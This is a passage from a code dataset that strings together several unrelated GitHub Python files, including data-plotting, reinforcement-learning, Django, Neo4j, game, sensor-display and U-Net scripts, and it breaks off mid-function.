skewness = stats.skew(df_manipulate)\n print(skewness)\n # Find kurtosis of distribution print\n kurtosis = stats.kurtosis(df_manipulate)\n print(kurtosis)\n\n\ndef draw_lineplot(df_m, title):\n \"\"\" \n This method is used to create a line plot.\n Arguments: x and y will be selectively assigned by method attributes. \n \"\"\"\n plt.figure()\n df_m.plot.line(linestyle='dashdot')\n plt.title(title, fontsize=12, color='blue')\n plt.legend(bbox_to_anchor=(1, 1))\n plt.show()\n\n return\n\n\ndef draw_table(df_m, title):\n \"\"\" \n This method is used to create a fine table.\n \"\"\"\n # Create a table using matplotlib\n plt.figure()\n # Turn off axis labels and ticks for good appearance\n plt.axis('off')\n plt.title(title, color='blue', fontsize=15, loc='left')\n # Display the table\n table = plt.table(cellText=df_m.values, colLabels=df_m.columns,\n rowLabels=df_m.index, loc='center', cellLoc='center')\n table.auto_set_column_width(col=list(range(len(df_m.columns))))\n\n return\n\n\n\"\"\"\nStep1: Read world bank data from file\n\"\"\"\nfilename = 'C:\\\\Users\\\\kthat\\\\OneDrive\\\\ADS1\\\\assignment2\\\\World_Development_Indicators_new3.xlsx'\ndataframe = read_data(filename)\n\n\"\"\"\nStep2 : Prepare data with manipulating dataframe and ploting bar charts for two dataframes.\nindicator 1 (EN.CO2.OTHX.ZS) selected - CO2 emissions from other sectors, excluding residential buildings \nand commercial and public services\n# indicator 2 (NV.IND.TOTL.KD.ZG) selected - Industry (including construction), annual % growth\n\"\"\"\nindicator_header = 'Series Code'\nindicator_value_1 = 'EN.CO2.OTHX.ZS'\nindicator_value_2 = 'NV.IND.TOTL.KD.ZG'\nyears = ['1996 [YR1996]', '2000 [YR2000]',\n '2004 [YR2004]', '2008 [YR2008]', '2012 [YR2012]']\ncountries = ['Norway', 'Australia', 'Ireland', 'Netherlands',\n 'Denmark', 'Iceland', 'Canada', 'United States']\n# Call method for manipulate dataframe\ndf_transposed_1, df_climate_1 = manipulate_data(\n dataframe, indicator_header, indicator_value_1, years, countries)\ndf_transposed_2, df_climate_2 = manipulate_data(\n dataframe, indicator_header, indicator_value_2, years, countries)\n# Print transposed data\nprint_to_file(df_transposed_1)\nprint_to_file(df_transposed_2)\n# Call method to plot bar chart\ntitle_bar_1 = \"CO2 emissions from all sectors, excluding residential, commercial and public services\"\ntitle_bar_2 = \"Industry (including construction), value added (annual % growth)\"\ndraw_barplot(df_climate_1, title_bar_1)\ndraw_barplot(df_climate_2, title_bar_2)\n\n\"\"\"\nStep3 : Prepare data for heatmap and ploting heatmap for selected countries.\n\"\"\"\nyears = ['1996 [YR1996]', '2000 [YR2000]',\n '2004 [YR2004]', '2008 [YR2008]', '2012 [YR2012]']\ncountry_header = 'Country Name'\n# Create heatmap for 'Ireland'\ncountry = 'Ireland'\ncmap = 'mako'\ndf_manipulate, df_heatmap, correlation = prepare_stats(\n dataframe, years, country_header, country)\n# print heatmap data\nprint_to_file(df_heatmap)\n# Call method to plot heatmap\ndraw_heatmap(correlation, country, cmap)\n\n\"\"\"\nStep4 : Find summary of Statistcis data\n\"\"\"\nstats_summary(df_manipulate)\n\n\"\"\"\nStep5 : Create another two heatmap for different countries\n\"\"\"\n# Create heatmap for 'United States'\ncountry = 'United States'\ncmap = 'viridis'\ndf_manipulate, df_heatmap, correlation = prepare_stats(\n dataframe, years, country_header, country)\nprint_to_file(df_heatmap)\ndraw_heatmap(correlation, country, cmap)\n# Create heatmap for 'Iceland'\ncountry = 'Iceland'\ncmap = 'magma'\ndf_manipulate, df_heatmap, correlation = prepare_stats(\n dataframe, years, country_header, country)\nprint_to_file(df_heatmap)\ndraw_heatmap(correlation, country, cmap)\n\n\"\"\"\nStep6 : Create line plots for two different indicators.\nindicator 1 (EN.CO2.BLDG.ZS) - CO2 emissions from residential buildings and commercial and public services\nindicator 2 (NV.AGR.TOTL.KD.ZG) - Agriculture, forestry, and fishing, value added (annual % growth)\n\"\"\"\nindicator_header = 'Series Code'\nindicator_value_1 = 'EN.CO2.BLDG.ZS'\nindicator_value_2 = 'NV.AGR.TOTL.KD.ZG'\nyears = ['1996 [YR1996]', '2000 [YR2000]',\n '2004 [YR2004]', '2008 [YR2008]', '2012 [YR2012]']\ncountries = ['Norway', 'Australia', 'Ireland',\n 'Netherlands', 'Iceland', 'Canada', 'United States']\ntitle1 = 'CO2 emissions from residential, commercial and public'\ntitle2 = 'Agriculture, forestry and fishing annual growth)'\n# Call method for manipulate dataframe\ndf_transposed_1, df_m1 = manipulate_data(\n dataframe, indicator_header, indicator_value_1, years, countries)\ndf_transposed_2, df_m2 = manipulate_data(\n dataframe, indicator_header, indicator_value_2, years, countries)\n# Print data to file\nprint_to_file(df_transposed_1)\nprint_to_file(df_transposed_2)\n# Call method to plot\ndraw_lineplot(df_transposed_1, title1)\ndraw_lineplot(df_transposed_2, title2)\n\n\"\"\"\nStep7 : Create table for Urban population growth\n\"\"\"\nyears_table = ['1996 [YR1996]', '2004 [YR2004]', '2012 [YR2012]']\ndf_table = df_m1.loc[:, years_table]\ntitle = 'Urban population by country and year'\n# Call method to create table\ndraw_table(df_table, title)\n","repo_name":"kavithasub/uh-study-modules","sub_path":"applied-data-science/assignment/assignment-2/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":7999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35442306390","text":"\r\n# Output the length, return and episode number\r\ndef output_return(len, ret, num):\r\n\t\tprint(f\"Episode number: {num}\")\r\n\t\tprint(f\"Episodic length: {len}\")\r\n\t\tprint(f\"Episodic return: {ret}\\n\")\r\n\r\n# Execute one full episode, calculate return and len of the episode\r\ndef proc_episode(args, policy, env):\r\n\tdone = False\r\n\tnext_state = env.reset()\r\n\tlen, ret = 0, 0, # Epis. len and return\r\n\r\n\twhile not done:\r\n\t\tlen += 1\r\n\t\tif args.img_rend:\r\n\t\t\tenv.render()\r\n\r\n\t\t# Generate and execute next action\r\n\t\taction = policy(next_state).detach().numpy()\r\n\t\tnext_state, rew, done, _ = env.step(action)\r\n\r\n\t\t# Aggregate reward\r\n\t\tret += rew\r\n\treturn len, ret\r\n\r\n# Execute user-defined number of episodes using a trained model\r\ndef test_model(args, policy, env):\r\n\ti, len, ret = 0, 0, 0\r\n\r\n\tfor i in range(args.img_rend_freq): # Using img_rend_freq as stopping criteria \r\n\t\tlen, ret = proc_episode(args, policy, env)\r\n\t\toutput_return(len=len, ret=ret, num=i)\r\n","repo_name":"bchartier777/PPO_v1","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"759539289","text":"class Sync:\n\t\n\tdef _init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef _isclose(self, a, b, rel_tol=1e-09, abs_tol=0.0):\n\t\treturn abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n\tdef check(self, x):\n\t\n\t\ti, f = 0\n\t\twhile i < (len(x) - 1):\n\t\t\tif i > 1:\n\t\t\t\ta = (float(times[i]) - float(times[i - 1]))\n\t\t\t\tb = (float(times[i + 1]) - float(times[i]))\n\t\t\t\tif not (self.isclose(a, b)):\n\t\t\t\t\tf += 1\n\t\t\t\t\t\n\t\t\ti += 1\n\t\tif f:\n\t\t\treturn 'True'\n\t\telse:\n\t\t\treturn 'False'\n\n\tdef resample(self, x, y):\n\t\tpass\n","repo_name":"zadewg/deside","sub_path":"ASYNC.py","file_name":"ASYNC.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"63"} +{"seq_id":"40833225260","text":"from .operating_schedule import OperatingSchedule, WorkTime\nfrom hr_2020_app.hr_2020_domain.basic_entity import BasicEntity\nfrom hr_2020_app.hr_2020_domain.basic_value import BasicValue\nfrom marshmallow import fields, post_load\nfrom typing import List\n\n\nclass Address(BasicValue):\n def __init__(self,\n street: str,\n neighborhood: str,\n city: str,\n state: str,\n street_number: str = 'S/N',\n postal_code: str = None,\n complement: str = None):\n self.street = street\n self.street_number = street_number\n self.complement = complement\n self.neighborhood = neighborhood\n self.city = city\n self.state = state\n self.postal_code = postal_code\n\n def to_string(self):\n return f'{self.street}, {self.street_number}, ' \\\n f'{self.complement} - {self.neighborhood}, {self.city} - ' \\\n f'{self.state}, {self.postal_code}'\n\n class Schema(BasicValue.Schema):\n street = fields.String(required=True, allow_none=False)\n street_number = fields.String(required=True, allow_none=False, default='S/N')\n complement = fields.String(required=False, allow_none=True)\n neighborhood = fields.String(required=True, allow_none=False)\n city = fields.String(required=True, allow_none=False)\n state = fields.String(required=True, allow_none=False)\n postal_code = fields.String(required=False, allow_none=True)\n\n @post_load\n def post_load(self, data, many, partial):\n return Address(**data)\n\n\nclass TouristSpot(BasicEntity):\n def __init__(self,\n name: str,\n telephone: str,\n address: Address,\n operating_schedules: list = None,\n description: str = None,\n web_page: str = None,\n _id = None):\n super(TouristSpot, self).__init__(_id=_id)\n self.name = name\n self.description = description\n self.telephone = telephone\n self.address = address\n self.operating_schedules: List[OperatingSchedule] = \\\n operating_schedules if operating_schedules else []\n self.web_page = web_page\n\n class Schema(BasicEntity.Schema):\n name = fields.String(required=True, allow_none=False)\n description = fields.String(required=False, allow_none=True)\n telephone = fields.String(required=True, allow_none=False)\n address = fields.Nested(Address.Schema, required=True, allow_none=False)\n operating_schedules = fields.Nested(\n OperatingSchedule.Schema,\n required=False,\n allow_none=True,\n many=True)\n web_page = fields.String(required=False, allow_none=True)\n\n @post_load\n def post_load(self, data, many, partial):\n return TouristSpot(**data)\n","repo_name":"aberriel/inkasa_backend","sub_path":"hr_2020_app/hr_2020_domain/tourist_spot/tourist_spot.py","file_name":"tourist_spot.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43756835466","text":"#! /usr/bin/python3\n\"\"\"\nQuery Open Weather API and AHT20 qwiic sensor.\nDisplay results on eInk bonnet.\nBased off of https://learn.adafruit.com/raspberry-pi-e-ink-weather-station-using-python/weather-station-code\nAKA 2020\n\"\"\"\n\nimport time\nimport urllib.request\nimport urllib.parse\nimport digitalio\nimport busio\nimport smbus\nimport board\nfrom adafruit_epd.ssd1675 import Adafruit_SSD1675\nfrom weather_graphics import Weather_Graphics\nimport adafruit_ahtx0\nimport json\nfrom akakeysreal import ak\n\n\nspi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)\necs = digitalio.DigitalInOut(board.CE0)\ndc = digitalio.DigitalInOut(board.D22)\nrst = digitalio.DigitalInOut(board.D27)\nbusy = digitalio.DigitalInOut(board.D17)\n\nbus = smbus.SMBus(1)\ni2c = busio.I2C(board.SCL, board.SDA)\naht20 = adafruit_ahtx0.AHTx0(i2c)\n\nteensy_msg_len = 29 # our teensy code always sends fixed-len response\nteensy_address = 0x77\n\nif ak[\"OPEN_WEATHER_TOKEN\"] == \"DUMMY_VALUE\":\n raise RuntimeError(\n \"You need to set your token first. If you don't already have one, you can register for a free account at https://home.openweathermap.org/users/sign_up\"\n )\n\n# Set up where we'll be fetching data from\nparams = {\"q\": ak[\"LOCATION\"], \"appid\": ak[\"OPEN_WEATHER_TOKEN\"]}\ndata_source = ak[\"DATA_SOURCE_URL\"] + \"?\" + urllib.parse.urlencode(params)\n\n# Initialize the Display\ndisplay = Adafruit_SSD1675(\n 122, 250, spi, cs_pin=ecs, dc_pin=dc, sramcs_pin=None, rst_pin=rst, busy_pin=busy,\n)\n\ndisplay.rotation = 1\n\ngfx = Weather_Graphics(display, am_pm=True, celsius=ak[\"USE_PROPER_UNITS_NOT_FAHRENHEIT\"])\nweather_refresh = None\nreading = {}\ntomp = {}\nSAMPLE_DEPTH = 250 # number of minutes of data to retain, here we choose 250mins, width of eink display\n\n\ndef init_readings():\n \"\"\"Fill sample buffer with zeroes.\"\"\"\n reading['aqiA'] = [0] * SAMPLE_DEPTH\n reading['aqiB'] = [0] * SAMPLE_DEPTH\n reading['pm25A'] = [0] * SAMPLE_DEPTH\n reading['pm25B'] = [0] * SAMPLE_DEPTH\n reading['pm4A'] = [0] * SAMPLE_DEPTH\n reading['pm4B'] = [0] * SAMPLE_DEPTH\n\n\ndef get_reading():\n \"\"\"Test function.\"\"\"\n # Write out I2C command: address, reg_write_dac, msg[0], msg[1]\n # msg = random.getrandbits(8)\n # bus.write_byte_data(address, reg_write_datareq, msg)\n\n # payload = bus.read_i2c_block_data(address, 0, msg_len)\n payload = bytearray(teensy_msg_len)\n i2c.readfrom_into(teensy_address, payload)\n for i in reading:\n reading[i].pop(0)\n reading['aqiA'].append(collapse(payload[0:4]))\n reading['aqiB'].append(collapse(payload[5:9]))\n reading['pm25A'].append(collapse(payload[10:14]))\n reading['pm25B'].append(collapse(payload[15:19]))\n reading['pm4A'].append(collapse(payload[20:24]))\n reading['pm4B'].append(collapse(payload[25:29]))\n\n\ndef collapse(intlist):\n \"\"\"Collapse a list of int values of chars into the int they represent.\"\"\"\n f = ''\n for i in intlist:\n f += chr(i)\n return int(f)\n\n\ninit_readings()\n\n'''\nBUTTONS AVAILABLE:\nimport digitalio\n\nup_button = digitalio.DigitalInOut(board.D5)\nup_button.switch_to_input()\ndown_button = digitalio.DigitalInOut(board.D6)\ndown_button.switch_to_input()\n\nif not up_button.value:\n print(\"Up Button Pushed\")\n\nif not down_button.value:\n print(\"Down Button Pushed\")\n'''\n\nwhile True:\n get_reading()\n # only query the weather every 10 minutes (and on first run)\n if (not weather_refresh) or (time.monotonic() - weather_refresh) > ak[\"REFRESH_INTERVAL\"]:\n try:\n response = urllib.request.urlopen(data_source)\n except urllib.error.HTTPError as e:\n # do something\n if ak[\"VERBOSE\"]:\n print('urllib.request Error code: ', e.code)\n except urllib.error.URLError as e:\n # do something\n if ak[\"VERBOSE\"]:\n print('Reason: ', e.reason)\n else:\n if response.getcode() == 200:\n value = response.read()\n tomp = json.loads(value)\n tomp['ttmp'] = \"{:.01f}\".format(aht20.temperature)\n tomp['thum'] = \"{:.0f}\".format(aht20.relative_humidity)\n tomp['aqiA'] = reading['aqiA']\n tomp['aqiB'] = reading['aqiB']\n tomp['pm25A'] = reading['pm25A']\n tomp['pm25B'] = reading['pm25B']\n tomp['pm4A'] = reading['pm4A']\n tomp['pm4B'] = reading['pm4B']\n if ak[\"VERBOSE\"]:\n print(\"Web-fetched this time, tomp is: \", tomp)\n # gfx.display_weather(json.dumps(tomp))\n weather_refresh = time.monotonic()\n else:\n if ak[\"VERBOSE\"]:\n print(\"Unable to retrieve data at {}\".format(data_source))\n else:\n tomp['ttmp'] = \"{:.01f}\".format(aht20.temperature)\n tomp['thum'] = \"{:.0f}\".format(aht20.relative_humidity)\n tomp['aqiA'] = reading['aqiA']\n tomp['aqiB'] = reading['aqiB']\n tomp['pm25A'] = reading['pm25A']\n tomp['pm25B'] = reading['pm25B']\n tomp['pm4A'] = reading['pm4A']\n tomp['pm4B'] = reading['pm4B']\n if ak[\"VERBOSE\"]:\n print(\"No web fetch this time, tomp is: \", tomp)\n gfx.display_weather(json.dumps(tomp))\n time.sleep(60) # wait 1+ minute before updating anything again, so the minutes-digit is sure to update\n","repo_name":"AKAMEDIASYSTEM/aka-aqm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4600732852","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\n\nscreen_width, screen_height = 600, 600\n\ncols = 6\nrows = 6\n\nclass Wall:\n def __init__(self):\n '''\n special function: \n 1. prolong, 2. shorten, 3. accelerate, 4. two balls \n '''\n self.width = screen_width // cols - 6\n self.height = 30\n \n \n \n # create blocks of the breakout game\n def create_wall(self, level):\n self.matrix = []\n with open(level) as f:\n lines = f.readlines()\n for line in lines:\n line_row = []\n for c in line.split(' '):\n line_row.append(int(c))\n self.matrix.append(line_row)\n\n self.blocks = []\n block_individual = []\n\n for row in range(rows):\n block_row = []\n for col in range(cols):\n block_x = col * self.width\n block_y = row * self.height\n\n strength = self.matrix[row][col] // 10\n special = self.matrix[row][col] % 10\n if strength == 0:\n col += 1\n continue\n\n lower_left = [-screen_width // 2 + (5 * (col + 1)) + block_x, screen_height // 2 - self.height - (5 * (row + 1)) - block_y]\n higer_left = [-screen_width // 2 + (5 * (col + 1)) + block_x, screen_height // 2 - (5 * (row + 1)) - block_y]\n higher_right = [-screen_width // 2 + self.width + (5 * (col + 1)) + block_x, screen_height // 2 - (5 * (row + 1)) - block_y]\n lower_right = [-screen_width // 2 + self.width + (5 * (col + 1)) + block_x, screen_height // 2 - self.height - (5 * (row + 1)) - block_y]\n \n rect = [lower_left, higer_left, higher_right, lower_right]\n \n block_individual = [rect, strength, False, special] # x y position, strength, hit or not, special function\n\n block_row.append(block_individual)\n\n self.blocks.append(block_row)\n\n # draw the blocks\n def draw(self):\n for row in self.blocks:\n for block in row:\n if block[3] != 0:\n glColor3f(1.0, 1.0, 0.0)\n elif block[1] == 3:\n # block_blue\n glColor3f(69.0/255.0, 177.0/255.0, 232.0/255.0)\n elif block[1] == 2:\n # block_green\n glColor3f(86.0/255.0, 174.0/255.0, 87.0/255.0)\n elif block[1] == 1:\n # block_red\n glColor3f(242.0/255.0, 85.0/255.0, 96.0/255.0)\n rect = block[0]\n glBegin(GL_QUADS)\n glVertex2f(rect[0][0], rect[0][1])\n glVertex2f(rect[1][0], rect[1][1])\n glVertex2f(rect[2][0], rect[2][1])\n glVertex2f(rect[3][0], rect[3][1])\n glEnd()\n # glFlush()","repo_name":"mayyar/6122_atari_breakout","sub_path":"wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18720077571","text":"import tkinter as tk\nimport string\n\nroot = tk.Tk()\n\n\nroot.geometry(\"250x170\")\n\nT = tk.Text(root, height=10 , width=100)\n\n\nl = tk.Label(root, text=\"File operations\")\nl.config(font=(\"Courier\", 14))\n\nf = open(\"C:\\\\Users\\\\C605\\\\Desktop\\\\Marvel.txt\", \"r\")\nx = f.read()\ndef inster_text():\n T.delete(1.0,'end')\n T.insert(tk.END, x)\n\ndef count():\n d = dict()\n\n with open('C:\\\\Users\\\\C605\\\\Desktop\\\\Marvel.txt', 'r') as file:\n # reading each line\n for line in file:\n\n # reading each word\n for word in line.split():\n # displaying the words\n if word in d:\n # Increment count of word by 1\n d[word] = d[word] + 1\n else:\n # Add the word to dictionary with count 1\n d[word] = 1\n print(d)\n T.delete(1.0,'end')\n T.insert(tk.END,d)\n\n\n\n\nprint(x)\n\nb1 = tk.Button(root, text=\"Read\", command=inster_text)\n\n\nb2 = tk.Button(root, text=\"Exit\",\n command=root.destroy)\n\n\nb3 = tk.Button(root, text=\"Calculate\",\n command=count)\n\nf.read()\nl.pack()\nT.pack()\nb1.pack()\nb2.pack()\nb3.pack()\n\ntk.mainloop()\n","repo_name":"armaras/cppPyhtonLab","sub_path":"tkinter.py","file_name":"tkinter.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16127826791","text":"'''Consecutive zeros\n\nThe goal of this challenge is to analyze a binary string consisting of only zeros\nand ones. Your code should find the biggest number of consecutive zeros in the string.\nFor example, given the string:\n\n\"1001101000110\"\n\nThe biggest number of consecutive zeros is 3.\n\nDefine a function named consecutive_zeros that takes a single parameter,\nwhich is the string of zeros and ones. Your function should return the number\ndescribed above.'''\n\ndef consecutive_zeros(binary):\n \n #Max successive 0 counter\n maxcount = 0\n \n #Live counter for 0 inside the for loop\n count = 0\n \n for number in binary:\n #if loops meets a 0, starts counting\n if number == \"0\" :\n count += 1\n \n #Update maxcount value if a better 0s streak is met inside the for loop\n if count > maxcount :\n maxcount = count\n \n #Reset counter if number met is not a 0\n else:\n count = 0\n\n return maxcount \n\n\n","repo_name":"roldel/pythonprinciples.com-challenges","sub_path":"Challenge_16_Consecutive_Zeros.py","file_name":"Challenge_16_Consecutive_Zeros.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23907021487","text":"from django.urls import path\nfrom .views import products, add_product, delete_product, product_edit, delete_item, delete_invItem\n\napp_name = 'products'\n\nurlpatterns = [\n path('products/', products, name='products'),\n path('add_product/', add_product, name='add_product'),\n path('delete_product/', delete_product, name='delete_product'),\n path('product//', product_edit, name='product_edit'),\n path('products/delete_item/', delete_item, name='delete_item'),\n path('product/delete_invoice_item', delete_invItem, name='delete_invItem'),\n]\n","repo_name":"Kkiirra/Auto-Invoice-Maker","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72096577800","text":"# -*- coding: utf-8 -*-\n\nfrom .configuration_manager import ConfigurationManager\nfrom .data_containers.data_container import DataContainer\nfrom .data_containers.wang_landau_data_container import WangLandauDataContainer\n\n\"\"\"\nmchammer - Monte Carlo simulation module\n\"\"\"\n\n__project__ = 'icet-mchammer'\n__description__ = 'icet Monte Carlo simulations module'\n__all__ = ['ConfigurationManager',\n 'DataContainer',\n 'WangLandauDataContainer']\n__maintainer__ = 'The icet developers team'\n__maintainer_email__ = 'icet@materialsmodeling.org'\n__url__ = 'http://icet.materialsmodeling.org/'\n","repo_name":"dengxiongshi/icet-master","sub_path":"mchammer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"42552920654","text":"arr = [2,4,6,3,34,56,354,78]\narr.sort()\n\ndef binS(arr,l,h,x):\n while(l<=h):\n m = l + int((h-l)/2)\n if arr[m] == x:\n return m\n elif arr[m] neo4j.ResultSummary:\n query = f\"\"\"UNWIND $rows AS row\nWITH row\nCALL {{\n WITH row \n MERGE (doc:{DOC_NODE} {{{DOC_ID}: row.{DOC_ID}}})\n SET\n doc.{DOC_CONTENT_TYPE} = row.{DOC_CONTENT_TYPE},\n doc.{DOC_CONTENT_LENGTH} = toInteger(row.{DOC_CONTENT_LENGTH}),\n doc.{DOC_EXTRACTION_DATE} = datetime(row.{DOC_EXTRACTION_DATE}),\n doc.{DOC_DIRNAME} = row.{DOC_DIRNAME},\n doc.{DOC_PATH} = row.{DOC_PATH}\n WITH doc, row\n WHERE doc.{DOC_ID} = row.{DOC_ID} and row.{DOC_ROOT_ID} IS NOT NULL\n MERGE (root:{DOC_NODE} {{{DOC_ID}: row.{DOC_ROOT_ID}}})\n MERGE (doc)-[:{DOC_ROOT_TYPE}]->(root)\n}} IN TRANSACTIONS OF $batchSize ROWS\n\"\"\"\n res = await neo4j_session.run(query, rows=records, batchSize=transaction_batch_size)\n summary = await res.consume()\n return summary\n\n\nasync def documents_ids_tx(tx: neo4j.AsyncTransaction) -> List[str]:\n res = await tx.run(document_ids_query())\n res = [doc_id.value(DOC_ID) async for doc_id in res]\n return res\n\n\ndef document_ids_query() -> str:\n query = f\"\"\"MATCH (doc:{DOC_NODE})\nRETURN doc.{DOC_ID} as {DOC_ID}\n\"\"\"\n return query\n","repo_name":"ICIJ/datashare-extension-neo4j","sub_path":"neo4j-app/neo4j_app/core/neo4j/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"18407464441","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nfrom PIL import Image as Ige\n\ndef writeInfo(text):\n\twith open(\"info.txt\",\"a\") as f:\n\t\tf.write(str(text)+\"\\n\")\n\ndef augment(img):\n\ti=1\n\twhile i!=95:\n\t\tj=1\n\t\twhile j!=95:\n\t\t\tif img[i][j]==1:\n\t\t\t\timg[i-1][j]=1\n\t\t\t\timg[i+1][j]=1\n\t\t\t\timg[i][j-1]=1\n\t\t\t\timg[i][j+1]=1\n\t\t\tj+=1\n\t\ti+=1\n\ndef binaryToImg(bin):\n\taxis = []\n\tfor xAxis in bin:\n\t\telement = []\n\t\tfor yAxis in xAxis:\n\t\t\ttemp = []\n\t\t\tif yAxis == 0:\n\t\t\t\ttemp.append(0)\n\t\t\t\ttemp.append(0)\n\t\t\t\ttemp.append(0)\n\t\t\telse:\n\t\t\t\ttemp.append(255)\n\t\t\t\ttemp.append(255)\n\t\t\t\ttemp.append(255)\n\t\t\ttemp = np.array(temp,dtype = 'uint8')\n\t\t\telement.append(temp)\n\t\telement = np.array(element)\n\t\taxis.append(element)\n\n\taxis = np.array(axis)\n\treturn axis\n\ndef compressImg(img):\n\tif len(img[0][0])==3:\n\t\tsample_image = np.asarray(a=img[:, :, 0], dtype=np.uint8)\n\t\treturn sample_image\n\tif len(img[0][0])==4:\n\t\tnewImg = []\n\t\ti=0\n\t\twhile i!=96:\n\t\t\ttempList = []\n\t\t\tj=0\n\t\t\twhile j!=96:\n\t\t\t\ttempList.append(255-img[i][j][3])\n\t\t\t\tj+=1\n\t\t\tnewImg.append(tempList)\n\t\t\ti+=1\n\t\timg = np.asarray(a = newImg,dtype = np.uint8)\n\t\treturn img\n\ndef readData_single(path):\n\tpath = path+\"/train_set_Unet.tfrecords\"\n\n\tfilename_queue = tf.train.string_input_producer([path],num_epochs = 20,shuffle = True)\n\n\treader = tf.TFRecordReader()\n\n\t_,serialized_example = reader.read(filename_queue)\n\n\tfeatures = tf.parse_single_example(serialized_example,features = {\n\t\t\t'img': tf.FixedLenFeature([], tf.string),\n\t\t\t'label': tf.FixedLenFeature([], tf.string)\n\t\t})\n\n\timage = tf.decode_raw(features['img'],tf.uint8)\n\n\timage = tf.reshape(image,[96,96,1])\n\n\tlabel = tf.decode_raw(features['label'],tf.uint8)\n\n\tlabel = tf.reshape(label,[96,96])\n\n\treturn image,label\n\t\n\nclass Unet:\n\n\tdef __init__(self):\n\t\n\t\tself.keep_prob = tf.placeholder(dtype=tf.float32)\n\n\t\tself.lamb = tf.placeholder(dtype = tf.float32)\n\n\t\tself.unPooling = []\n\n\t\tself.input_image = None\n\n\t\tself.input_label = None\n\n\t\tself.prediction = None\n\n\t\tself.correct_prediction = None\n\n\t\tself.accurancy = None\n\n\t\tself.loss = None\n\n\t\tself.loss_mean = None\n\n\t\tself.loss_all = None\n\n\t\tself.train_step = None\n\n\n\tdef weight_variable(self,shape):\n\t initial = tf.truncated_normal(shape,stddev=tf.sqrt(x = 2/(shape[0]*shape[1]*shape[2])))\n\t #initial = tf.truncated_normal(shape,stddev=0.01)\n\t tf.add_to_collection(name = 'loss',value=tf.contrib.layers.l2_regularizer(self.lamb)(initial)) \n\t return tf.Variable(initial)\n\n\tdef bias_variable(self,shape):\n\t initial = tf.random_normal(shape=shape,dtype = tf.float32)\n\t return tf.Variable(initial_value = initial)\n\n\tdef weight_variable_alter(self,shape):\n\t initial = tf.truncated_normal(shape,stddev=0.28)\n\t tf.add_to_collection(name = 'loss',value=tf.contrib.layers.l2_regularizer(self.lamb)(initial)) \n\t return tf.Variable(initial)\n\n\tdef conv2d(self,x,W):\n\t return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding = 'SAME')\n\n\tdef max_pooling(self,x):\n\t return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\n\n\tdef deconv(self,x,W,O):\n\t\treturn tf.nn.conv2d_transpose(value = x,filter = W,output_shape = O,strides=[1,2,2,1],padding = 'VALID')\n\n\tdef merge_img(self,convo_layer,unsampling):\n\t\treturn tf.concat(values = [convo_layer,unsampling],axis = -1)\n\n\tdef setup_network(self,batch_size,mode):\n\n\t\tself.input_image = tf.placeholder(dtype = tf.float32,shape = [batch_size,96,96,1])\n\n\t\tself.input_label = tf.placeholder(dtype = tf.int32,shape = [batch_size,96,96])\n\n\n\t\t#first convolution 96*96*1 -->48*48*32\n\n\t\t\n\t\twith tf.name_scope('first_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,1,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(self.input_image,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,32,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\tself.unPooling.append(X)\n\n\t\t\t#---------maxpool--------\n\n\t\t\timg_pool = self.max_pooling(img_conv)\n\n\t\t\tX = img_pool\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\t\t#second convolution 48*48*32 --> 24*24*64\n\n\t\twith tf.name_scope('second_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,32,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,64,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = 